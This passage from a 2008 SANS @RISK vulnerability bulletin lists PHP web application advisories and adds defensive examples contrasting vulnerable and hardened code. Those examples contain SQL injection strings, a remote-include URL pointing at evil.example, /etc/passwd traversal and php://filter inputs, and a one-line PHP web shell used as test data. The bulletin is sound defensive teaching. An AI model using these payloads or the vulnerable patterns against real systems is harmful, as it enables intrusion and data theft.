  • Description: PHPEasyData is a PHP-based application that allows users to display dynamic data and directories. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat_id" parameter of the "annuaire.php" script before using it in an SQL query. PHPEasyData version 1.5.4 is affected.
  • Ref: http://www.securityfocus.com/bid/29068
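Nearly every SQL injection entry above has the same root cause: a request parameter ("ParentId", "pid", "cat_id", "id") is pasted into the SQL text instead of being bound as a value. The following is an added example, not code from any product listed here; it assumes a hypothetical "items" table with an integer key "id", uses an in-memory SQLite database (pdo_sqlite) so it runs stand-alone, and shows the vulnerable pattern beside the hardened one.

```php
<?php
// Added example, not code from any product listed in this bulletin. It assumes a
// hypothetical table "items" with an integer key "id" and a PDO connection; the
// "id" parameter stands in for the ParentId/pid/cat_id/id parameters reported above.

// --- Vulnerable pattern: the request value is concatenated into the SQL text. ---
// With ?id=1 OR 1=1 the WHERE clause matches every row; with
// ?id=0 UNION SELECT user,pass FROM users the attacker reads another table.
function fetchItemVulnerable(PDO $pdo, string $id): array
{
    $sql = "SELECT id, title FROM items WHERE id = " . $id;   // BAD: input becomes SQL syntax
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened pattern: validate the type, then bind the value as a parameter. ---
// The SQL text is fixed at prepare() time; the bound value can only ever be data.
function fetchItemSafe(PDO $pdo, string $id): array
{
    // Positive-integer allowlist check: anything else is rejected before the query.
    if (!preg_match('/^[1-9]\d{0,9}$/', $id)) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT id, title FROM items WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demo against an in-memory SQLite database with constructed rows.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO items VALUES (1,'public'), (2,'internal'), (3,'secret')");

$payload = '1 OR 1=1';   // attacker-controlled value of the "id" parameter
echo "vulnerable: " . count(fetchItemVulnerable($pdo, $payload)) . " row(s) returned\n";
try {
    fetchItemSafe($pdo, $payload);
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected (" . $e->getMessage() . ")\n";
}
echo "hardened:   " . count(fetchItemSafe($pdo, '2')) . " row(s) returned\n";
```

Two caveats for the PHP applications of this vintage: the legacy mysql_* extension has no server-side prepared statements, so fixes there mean migrating to mysqli or PDO (with PDO::ATTR_EMULATE_PREPARES set to false for MySQL) or, at minimum, casting numeric parameters and quoting escaped strings. For free-text parameters such as "search" or "keyword" there is no type to validate, so binding is the only reliable defence, and the same value must still be HTML-encoded on output to close the cross-site scripting half of the mixed entries below.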

  • 08.19.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Interchange Unspecified Denial of Service
  • Description: Interchange is an ecommerce application implemented in Perl. The application is exposed to a denial of service issue that stems from an error when processing certain unspecified HTTP POST requests. Interchange version 5.2.1 is affected.
  • Ref: http://www.securityfocus.com/bid/28987

  • 08.19.63 - CVE: Not Available
  • Platform: Web Application
  • Title: WebGUI Data Form Unspecified Security Issue
  • Description: WebGUI is a web application framework and content manager. The application is exposed to an unspecified issue on the Data Form list view. WebGUI version 7.4.34 is affected.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=595907&group_id=51417

  • 08.19.64 - CVE: Not Available
  • Platform: Web Application
  • Title: PBCS Multiple Input Validation Vulnerabilities
  • Description: PBCS (Project Based Calendaring System) is a web-based calendar application implemented in PHP. The application is exposed to multiple input validation issues. Project Based Calendaring System version 0.7.1 is affected.
  • Ref: http://www.securityfocus.com/bid/28991

  • 08.19.65 - CVE: Not Available
  • Platform: Web Application
  • Title: OxYProject Edit Chat History Remote Code Execution
  • Description: OxYProject is a PHP-based chat room application. The application is exposed to an issue that lets remote attackers execute arbitrary code because it fails to properly sanitize user-supplied input to the "Your Message Here" form field parameter of the "edithistory.php" script. OxYProject version 0.85 is affected.
  • Ref: http://www.securityfocus.com/bid/28992

  • 08.19.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Harris Wap Chat "sysFileDir" Parameter Multiple Remote File Include Vulnerabilities
  • Description: Harris Wap Chat is a PHP-based application. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/28995

  • 08.19.67 - CVE: Not Available
  • Platform: Web Application
  • Title: Interact Multiple Remote File Include Vulnerabilities
  • Description: Interact is a web-based platform that supports online learning. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "CONFIG[LANGUAGE_CPATH]" parameter of the "modules/forum/embedforum.php" script and the "CONFIG[BASE_PATH]" parameter of the "modules/scorm/lib.inc.php" script. Interact version 2.4.1 is affected.
  • Ref: http://www.securityfocus.com/bid/28996

  • 08.19.68 - CVE: Not Available
  • Platform: Web Application
  • Title: VWar 1.6.1 R2 Multiple Remote Vulnerabilities
  • Description: VWar is a web-based team organizer. The application is exposed to multiple remote issues. VWar version 1.6.1 R2 is affected.
  • Ref: http://www.securityfocus.com/bid/29001

  • 08.19.69 - CVE: Not Available
  • Platform: Web Application
  • Title: vlbook Cross-Site Scripting and Local File Include Vulnerabilities
  • Description: vlbook is a web-based guestbook application. The application is exposed to multiple input validation issues. vlbook version 1.21 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491519

  • 08.19.70 - CVE: Not Available
  • Platform: Web Application
  • Title: ActualScripts ActualAnalyzer Lite "admin.php" Local File Include
  • Description: ActualAnalyzer is a web-based application that collects site statistics. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "style" parameter of the "admin.php" script. ActualAnalyzer Lite version 2.78 is affected.
  • Ref: http://www.securityfocus.com/bid/29007

  • 08.19.71 - CVE: Not Available
  • Platform: Web Application
  • Title: MyKnowledgeQuest KnowledgeQuest Administration Multiple Authentication Bypass Vulnerabilities
  • Description: KnowledgeQuest is a web-based knowledgebase application. The application is exposed to multiple authentication bypass issues. The authentication process allows an attacker to bypass authentication and gain administrative access. KnowledgeQuest version 2.6 is affected.
  • Ref: http://www.securityfocus.com/bid/29012

  • 08.19.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Robocode AWT Event Queue Security Bypass
  • Description: Robocode is a Java programming game. The application is exposed to a security bypass issue. Robots can access the internals of the Robocode game via specially-crafted calls to the AWT Event Queue. Robocode versions prior to 1.6.0 are affected.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=596393

  • 08.19.73 - CVE: Not Available
  • Platform: Web Application
  • Title: Project Alumni SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: Project Alumni is a web-based application to track and display school alumni. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sufficiently sanitize user-supplied input. Project Alumni version 1.0.9 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491552

  • 08.19.74 - CVE: Not Available
  • Platform: Web Application
  • Title: Zen Cart "keyword" parameter SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: Zen Cart is a PHP-based e-commerce shopping cart application. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "keyword" parameter of the "index.php" script. Zen Cart 2008 is affected.
  • Ref: http://www.securityfocus.com/bid/29020

  • 08.19.75 - CVE: Not Available
  • Platform: Web Application
  • Title: OpenAutoClassifieds Multiple SQL Injection Vulnerabilities
  • Description: OpenAutoClassifieds is a web-based classified-ads application for vehicles. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the following scripts and parameters: "login.php: username" and "listings.php: id". OpenAutoClassifieds version 1.4.3b is affected.
  • Ref: http://www.securityfocus.com/bid/29027

  • 08.19.76 - CVE: Not Available
  • Platform: Web Application
  • Title: iTCms "boxpop.php" Remote File Include
  • Description: iTCms is a PHP-based content manager. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input in the "shout" parameter of the "box/minichat/boxpop.php" script. iTCms version 1.9 is affected.
  • Ref: http://www.securityfocus.com/bid/29028

  • 08.19.77 - CVE: Not Available
  • Platform: Web Application
  • Title: SiteXS CMS "upload.php" Arbitrary File Upload
  • Description: SiteXS CMS is a PHP-based content manager. The application is exposed to an issue that lets remote attackers upload and execute arbitrary script code because it fails to properly sanitize user-supplied input to the "adm/visual/upload.php" script.
  • Ref: http://www.securityfocus.com/archive/1/491578

  • 08.19.78 - CVE: Not Available
  • Platform: Web Application
  • Title: Maian Script World Multiple Scripts SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: Multiple Maian Script World products are exposed to cross-site scripting issues and SQL injection issues because the applications fail to sufficiently sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/archive/1/491586

  • 08.19.79 - CVE: Not Available
  • Platform: Web Application
  • Title: cpLinks Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: cpLinks is a PHP-based links directory script. The application is exposed to multiple input validation issues. cpLinks version 1.03 is affected.
  • Ref: http://www.securityfocus.com/bid/29035

  • 08.19.80 - CVE: Not Available
  • Platform: Web Application
  • Title: Kmita Tellfriend "htmlcode.php" Remote File Include
  • Description: Kmita Tellfriend is a recommendation script. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input in the "file" parameter of the "htmlcode.php" script. Kmita Tellfriend version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/29042

  • 08.19.81 - CVE: Not Available
  • Platform: Web Application
  • Title: SmartBlog Multiple Input Validation Vulnerabilities
  • Description: SmartBlog is a PHP-based weblog application. The application is exposed to multiple issues because it fails to sufficiently sanitize user-supplied data. SmartBlog version 1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/29043

  • 08.19.82 - CVE: Not Available
  • Platform: Web Application
  • Title: Kmita Mail "htmlcode.php" Remote File Include
  • Description: Kmita Mail is a mail form processor. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input in the "file" parameter of the "htmlcode.php" script. Kmita Mail version 3.0 is affected.
  • Ref: http://www.securityfocus.com/bid/29044

  • 08.19.83 - CVE: Not Available
  • Platform: Web Application
  • Title: TLM CMS "index.php" Multiple SQL Injection Vulnerabilities
  • Description: TLM CMS is a content manager. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data. TLM CMS version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/29049

  • 08.19.84 - CVE: Not Available
  • Platform: Web Application
  • Title: ScorpNews "example.php" Remote File Include
  • Description: ScorpNews is a web-based application. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input in the "site" parameter of the "example.php" script. ScorpNews version 2.0 is affected.
  • Ref: http://www.milw0rm.com/exploits/5539
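The remote and local file include entries in this section (Harris Wap Chat, Interact, iTCms, Kmita Tellfriend, Kmita Mail, ScorpNews, and the ActualAnalyzer local include) share one pattern: a request parameter ends up in an include or require statement. The example below is added here and is not code from any of those products; it assumes a hypothetical "templates/" directory holding "home.php" and "contact.php", and contrasts the vulnerable include with an allowlist-plus-realpath resolver.

```php
<?php
// Added example, not code from any product listed in this bulletin. Assumes a
// hypothetical templates directory containing home.php and contact.php.

// --- Vulnerable pattern: the request names the file to include. ---
//   ?file=http://evil.example/shell.txt        remote include (allow_url_include=On)
//   ?file=../../../../etc/passwd%00            local file disclosure (older PHP, null byte)
//   ?file=php://filter/convert.base64-encode/resource=config  source code leak
function renderVulnerable(string $file): void
{
    include $file . '.php';   // BAD: attacker controls path, wrapper, or URL
}

// --- Hardened pattern: map the untrusted name to a fixed allowlist, then verify
//     the resolved path still lives under the base directory. ---
const TEMPLATES = ['home' => 'home.php', 'contact' => 'contact.php'];

function resolveTemplate(string $name, string $baseDir): string
{
    if (!array_key_exists($name, TEMPLATES)) {
        throw new InvalidArgumentException('unknown page');
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . TEMPLATES[$name]);
    // Defence in depth: even an allowlisted entry must resolve inside $baseDir
    // (protects against a mis-edited allowlist or a symlink in the directory).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('template outside base directory');
    }
    return $path;
}

function renderSafe(string $name, string $baseDir): void
{
    include resolveTemplate($name, $baseDir);
}

// Self-contained demo: constructed template files in a temporary directory.
$dir = sys_get_temp_dir() . '/tpl-demo-' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/home.php", "<?php echo \"home template rendered\\n\";\n");
file_put_contents("$dir/contact.php", "<?php echo \"contact template rendered\\n\";\n");

$requests = ['home', '../../../../etc/passwd', 'http://evil.example/shell.txt',
             'php://filter/resource=home'];
foreach ($requests as $name) {
    try {
        renderSafe($name, $dir);
    } catch (Exception $e) {
        echo "$name: rejected (" . $e->getMessage() . ")\n";
    }
}
```

Setting allow_url_include=Off (the default since PHP 5.2) removes only the remote half of the problem; traversal to local files and php:// wrappers still work against the vulnerable function, which is why the fix has to be an allowlist in code rather than a php.ini change. The Interact entry shows a related variant: a "CONFIG[...]" array is read before it is ever assigned, so with register_globals=On the request defines it. Initialising every configuration array before use, and running with register_globals=Off, closes that path.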

  • 08.19.85 - CVE: Not Available
  • Platform: Web Application
  • Title: DeluxeBB SQL Injection and PHP Injection Vulnerabilities
  • Description: DeluxeBB is a web-based forum. DeluxeBB is exposed to multiple issues because it fails to properly sanitize user-supplied input. DeluxeBB versions 1.2 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/29062

  • 08.19.86 - CVE: Not Available
  • Platform: Web Application
  • Title: Power Editor Multiple Input Validation Vulnerabilities
  • Description: Power Editor is a web-based application for editing files. The application is exposed to multiple input validation issues. Power Editor version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/29063

  • 08.19.87 - CVE: Not Available
  • Platform: Web Application
  • Title: QTO File Manager "qtofm.php" Arbitrary File Upload
  • Description: QTO File Manager is a web-based file management application. The application is exposed to an issue that lets remote attackers upload and execute arbitrary script code because it fails to properly sanitize user-supplied input to the "qtofm.php" script.
  • Ref: http://www.securityfocus.com/archive/1/491699
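The SiteXS CMS and QTO File Manager entries describe the same failure: an upload handler keeps the client-supplied file name and writes it somewhere the web server will execute PHP. The example below is added here and is not code from either product; it assumes a hypothetical form field "f" and a storage directory that is either outside the document root or served with script execution disabled, and it exercises the content checks on constructed files so it runs without an HTTP request.

```php
<?php
// Added example, not code from any product listed in this bulletin. Assumes a
// hypothetical upload form field "f" and a $destDir that the web server never
// executes scripts from (outside the webroot, or with PHP handlers disabled).

// --- Vulnerable pattern: trusts the client name and stores under the webroot. ---
// Upload "shell.php", then request /uploads/shell.php: the server runs it.
function storeUploadVulnerable(array $file): string
{
    $dest = __DIR__ . '/uploads/' . $file['name'];          // BAD: attacker-chosen name
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// --- Hardened checks, kept separate so they can be run on any file. ---
const MAX_BYTES = 2 * 1024 * 1024;
// Allowlist: final extension => the MIME type the file *content* must sniff as.
const ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];

function checkUploadedFile(string $tmpPath, string $clientName): string
{
    $size = filesize($tmpPath);
    if ($size === false || $size > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Only the final extension counts, lower-cased: "shell.php.png" yields "png".
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Sniff the bytes: a PHP payload renamed to .png reports text/x-php, not image/png.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }
    return $ext;
}

function storeUploadSafe(array $file, string $destDir): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a valid upload');
    }
    $ext = checkUploadedFile($file['tmp_name'], $file['name']);
    // Server-chosen random name: the client never controls path or extension.
    $dest = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    return $dest;
}

// Demo on constructed files: a minimal PNG header and a PHP web shell.
$dir = sys_get_temp_dir() . '/upload-demo-' . bin2hex(random_bytes(4));
mkdir($dir);
$png = "\x89PNG\r\n\x1a\n" . "\x00\x00\x00\x0dIHDR" . pack('NN', 1, 1)
     . "\x08\x02\x00\x00\x00" . "\x00\x00\x00\x00";
file_put_contents("$dir/a", $png);
file_put_contents("$dir/b", "<?php system(\$_GET['c']); ?>");

foreach ([['a', 'photo.png'], ['b', 'shell.php'], ['b', 'shell.php.png']] as [$f, $name]) {
    try {
        echo "$name: accepted as ." . checkUploadedFile("$dir/$f", $name) . "\n";
    } catch (RuntimeException $e) {
        echo "$name: rejected (" . $e->getMessage() . ")\n";
    }
}
```

The order of the checks matters less than the last step: because the stored name is generated by the server and carries only an allowlisted extension, tricks such as "shell.php.png" on a server whose handler matches any ".php" segment, or a name containing path separators, never reach the filesystem. Content sniffing is a second layer, not a substitute; an image that also parses as PHP is still harmless if the directory it lands in is never executed.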

(c) 2008. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.